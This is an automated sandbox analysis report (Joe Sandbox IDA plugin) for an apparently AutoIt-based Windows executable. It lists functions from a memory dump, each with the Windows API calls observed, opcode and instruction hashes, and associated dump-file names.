Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: e446813c92b380dcc48f33dd9e728c1d71eea4583599ea7deed0abb830c19399
Instruction ID: c47aa49d03b851c6db8bd69bfd923cc08e7c12e77024e115b762eaf46e744b15
Opcode Fuzzy Hash: e446813c92b380dcc48f33dd9e728c1d71eea4583599ea7deed0abb830c19399
Instruction Fuzzy Hash: 5A71CEB8D112108FEF84EFB9A84D6653AE1FB8B384F45823AD15AC7B61EB384444CF44

Function 0083C161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 007D3A04

Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0083C259
KillTimer.USER32(?,00000001,?,?), ref: 0083C261
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0083C270

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 163b780d20a17992ef2c483b7f682ea0f1d6f9d4d4d5ff2c4e2bc4b9075e7c7d
Instruction ID: b3d187a22b8a5885be2fc1db3e21c6ac0db52172cbc49f50e1f7b90101f45e4f
Opcode Fuzzy Hash: 163b780d20a17992ef2c483b7f682ea0f1d6f9d4d4d5ff2c4e2bc4b9075e7c7d
Instruction Fuzzy Hash: 1D319570904354AFEB229F648855BEBBBECFF46308F04049AD5DAA7241C7745A84CB91

Function 008086AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,008085CC,?,00898CC8,0000000C), ref: 00808704
GetLastError.KERNEL32(?,008085CC,?,00898CC8,0000000C), ref: 0080870E
__dosmaperr.LIBCMT ref: 00808739

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: adeb01f5326bb7daaa644d69b933657b00626889729a586fbfd3419fbab8adf3
Instruction ID: 5b15648b182fcab9cc7b1b24b37a7731572a079bcebe4916497df5d7b4f05ec0
Opcode Fuzzy Hash: adeb01f5326bb7daaa644d69b933657b00626889729a586fbfd3419fbab8adf3
Instruction Fuzzy Hash: 19016F336052209AD6E062385C5977F6B45FBA3774F370119F864DB2D2DEA28CC18651

Function 007DDB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 007DDB7B
DispatchMessageW.USER32(?), ref: 007DDB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007DDB9F
Sleep.KERNELBASE(0000000A), ref: 007DDBB1
TranslateAcceleratorW.USER32(?,?,?), ref: 00821CC9

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID:
API String ID: 3288985973-0
Opcode ID: 1a4ebb62a6dc8b9ee9ae7581412b009c29a5d2105a690c661d076a9354b0a97c
Instruction ID: 13b73ff500b00d270c1648a132dc2036efb39b4097c01288961f06d472c88f50
Opcode Fuzzy Hash: 1a4ebb62a6dc8b9ee9ae7581412b009c29a5d2105a690c661d076a9354b0a97c
Instruction Fuzzy Hash: 61F05E306443409BEB30CBA0DC4DFAA73B8FB45310F50492AE65AC31C0DB789888DB25

Function 007E1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 007E17F6

Strings

CALL, xrefs: 007E17C6

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 16a65bef59786bac3049cedec6971e370c02d8c051b079d7c3e10d117d3e2634
Instruction ID: f154f1c66b48d74aad5f4d7bf08ccf73c9239d8e79d91056b1aff411005f3c4f
Opcode Fuzzy Hash: 16a65bef59786bac3049cedec6971e370c02d8c051b079d7c3e10d117d3e2634
Instruction Fuzzy Hash: 06229B70609281DFC714DF15C485A2ABBF1FF89314F58896DF4968B3A2D739E891CB82

Function 007D2DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00812C8C

Part of subcall function 007D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D3A97,?,?,007D2E7F,?,?,?,00000000), ref: 007D3AC2

Part of subcall function 007D2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007D2DC4

Strings

X, xrefs: 00812C5A

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: b1cd5ab15276890b5a8dfda1d6d797e95df6f791209827d46213e4e6e424b56c
Instruction ID: bf8073afccc9f1e44fa6841ee9154b9cde6428b2ff7a51f61d78539f21fb3f51
Opcode Fuzzy Hash: b1cd5ab15276890b5a8dfda1d6d797e95df6f791209827d46213e4e6e424b56c
Instruction Fuzzy Hash: 02219671A002589BDF41EF94C8497EE7BFCEF49304F00405AE505E7341EBB859898FA1

Function 007D3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 007D3908

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 4d180f0e8734fffa276e7ba4ef00c4560b240aaa92997c0f027dc38111606c09
Instruction ID: f2f70fa25ffc4e8cfaa459901c2505684baa9473b620589cf3dc560fde981004
Opcode Fuzzy Hash: 4d180f0e8734fffa276e7ba4ef00c4560b240aaa92997c0f027dc38111606c09
Instruction Fuzzy Hash: 103180705043019FEB20DF24D888797BBF8FB49708F00092EF59997740E7B9AA44CB62

Function 007EF645 Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 007EF661

Part of subcall function 007DD730: GetInputState.USER32 ref: 007DD807

Sleep.KERNEL32(00000000), ref: 0082F2DE

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: InputSleepStateTimetime
String ID:
API String ID: 4149333218-0
Opcode ID: 9190a05d94d7853398943699ac8d60ae3006f214c0e61bb97f2b3cfcb61e733d
Instruction ID: 8176de983c6ccc74e8f8859e55277ac4b1d0771b2d1df82af410e12251e00816
Opcode Fuzzy Hash: 9190a05d94d7853398943699ac8d60ae3006f214c0e61bb97f2b3cfcb61e733d
Instruction Fuzzy Hash: 5EF08C31240205DFD310EF69E449B6AB7F8FF4A760F00006AE85AC7361DBB0A800CB90

Function 007DB710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 007DBB4E

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 7bef742201130fa230020bb73459d0ba608c627e5310455737dd9331cf273679
Instruction ID: 8bc31c7b3db88cbf3c4740664c5255c4e8a52893befc1818444187ee1d905e99
Opcode Fuzzy Hash: 7bef742201130fa230020bb73459d0ba608c627e5310455737dd9331cf273679
Instruction Fuzzy Hash: 9B32BF74A00219DFDB20CF58C898ABEB7B5FF49314F15805AE915AB362C778ED81CB91

Function 00862598 Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000013,00000001,?), ref: 00862649

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: ba0305daf0676137a42a413eb0bb53239fae8da5e3b6c890f9146db512dd2759
Instruction ID: 7d291c25416c2788fef6df6128624e6e66b33914c9e47f86d8396f76522d2c67
Opcode Fuzzy Hash: ba0305daf0676137a42a413eb0bb53239fae8da5e3b6c890f9146db512dd2759
Instruction Fuzzy Hash: 0A21F274200A1AAFD760DF18C8D0976B7A9FB54368B1581ADE897CB392CB71ED41CB90

Function 008613B7 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000001,?), ref: 00861420

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: bd632453aa78555c126ee6326f791e25d783c425509b639f0160b03cdd49c29f
Instruction ID: ac26a5abf4cd8c82ccc3575957947be38e77b823b5728452c03bd1d29df5cf34
Opcode Fuzzy Hash: bd632453aa78555c126ee6326f791e25d783c425509b639f0160b03cdd49c29f
Instruction Fuzzy Hash: 05319131204642AFDB14EF29C499B69B7A2FF44328F098169E855CB392DB75EC41CBD1

Function 007D4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 007D4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,007D4EDD,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4E9C
Part of subcall function 007D4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 007D4EAE
Part of subcall function 007D4E90: FreeLibrary.KERNEL32(00000000,?,?,007D4EDD,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4EC0

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4EFD

Part of subcall function 007D4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00813CDE,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4E62
Part of subcall function 007D4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 007D4E74
Part of subcall function 007D4E59: FreeLibrary.KERNEL32(00000000,?,?,00813CDE,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4E87

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: fab7577d9dd25f13f8ef8c228ecb434de284a99beca992b69fe413c15728093e
Instruction ID: 16ee602f7b48415f1c520528dece9e28608977b892a0780f3c2a7eae84949ac4
Opcode Fuzzy Hash: fab7577d9dd25f13f8ef8c228ecb434de284a99beca992b69fe413c15728093e
Instruction Fuzzy Hash: E611E332600205EBCB14AF64DC0AFAD77B5AF40710F10842FF582A63E1EE789A459790

Function 00808402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00808440

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: e4f044ed95bba4fe4ae70163a7cababf83bd9b23f9f28359db571eb116a77241
Instruction ID: c4a87a35685b15b5ec50a41a1b06fbae0443d0921985a0aa6431332436615e38
Opcode Fuzzy Hash: e4f044ed95bba4fe4ae70163a7cababf83bd9b23f9f28359db571eb116a77241
Instruction Fuzzy Hash: AE11067590410AEFCB05DF58E9419DA7BF9FF48314F104059F808EB352DA31DA518BA5

Function 008629BF Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?,?,?,008614B5,?), ref: 00862A01

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: f38b2ba257f20f1beb5c305a7b75be9c813686bd69427da816ec07c1d5b5e54c
Instruction ID: 5d9d1ea075a6a26fc9068127d4790f621a3467c7b1393a4c838aeda38fa6b941
Opcode Fuzzy Hash: f38b2ba257f20f1beb5c305a7b75be9c813686bd69427da816ec07c1d5b5e54c
Instruction Fuzzy Hash: 8D019236300E629FD324CA6CC455F223792FBC5319F2A84A8C047CB251D772EC42C790

Function 007FE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: 48f9c2f9f6675be88a5ad3503ad8e621b6de4f57f75ccb10fd8e4eeb1b33dce9
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: 2CF0F932510E1CD6C6313E698C09B7A3398EF52330F100715F621D63E1DF78980185A6

Function 0086149E Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?), ref: 008614EB

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: f86223a37dbd6e48eb8186761b0ae7a4db63d3fbc77dc150b9662f5ade54f721
Instruction ID: a7ced2b483fa3066acb3a55760ee8e82b21dc3c27bd4b00271f8030f6f649831
Opcode Fuzzy Hash: f86223a37dbd6e48eb8186761b0ae7a4db63d3fbc77dc150b9662f5ade54f721
Instruction Fuzzy Hash: 5001D4353047519FD720DFA9D440826BBA6FF843687598099E84ACB753DA72DD82C780

Function 00803820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,008A1444,?,007EFDF5,?,?,007DA976,00000010,008A1440,007D13FC,?,007D13C6,?,007D1129), ref: 00803852

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fd771449445a760e61456de60898e6529e2d1b73e72211a210ec8f91da17ff1c
Instruction ID: 5ba0fe773e024161cda42b9985e3fcd4ce9ef2fca9a2e8407c610eac792a5b48
Opcode Fuzzy Hash: fd771449445a760e61456de60898e6529e2d1b73e72211a210ec8f91da17ff1c
Instruction Fuzzy Hash: 38E0E53210022897EB612A669C09BAB364CFF427B0F0580B1FD15D26D0CB15DE0181E0

Function 007D4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4F6D

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 689b037f994f91b3c6a4eff75a51597dfad1ce7d82bd22b2741e2a538ad19bb6
Instruction ID: 9f5d3de207a1acfe96d165c2ac98288fd7bd47029f383778e4c3e94c7ab14fef
Opcode Fuzzy Hash: 689b037f994f91b3c6a4eff75a51597dfad1ce7d82bd22b2741e2a538ad19bb6
Instruction Fuzzy Hash: EDF01571105752CFDB349F64D494822BBF4AF14329328897FE2EA82621CB399844DB10

Function 00862A55 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00862A66

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 790ef4479a674e01ddeb9a6ec3c3896a6358a94e837df50b114e22ab796b1ffb
Instruction ID: 0aa1a919bac2b5bb07da47300509cc86c80b5c7a7263317dade56b1dad864192
Opcode Fuzzy Hash: 790ef4479a674e01ddeb9a6ec3c3896a6358a94e837df50b114e22ab796b1ffb
Instruction Fuzzy Hash: 93E0263635052AAAC710EB74DC809FE774CFF60396B11053AFC26C2140DF70999182E0

Function 007D2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007D2DC4

Part of subcall function 007D6B57: _wcslen.LIBCMT ref: 007D6B6A

Memory Dump Source

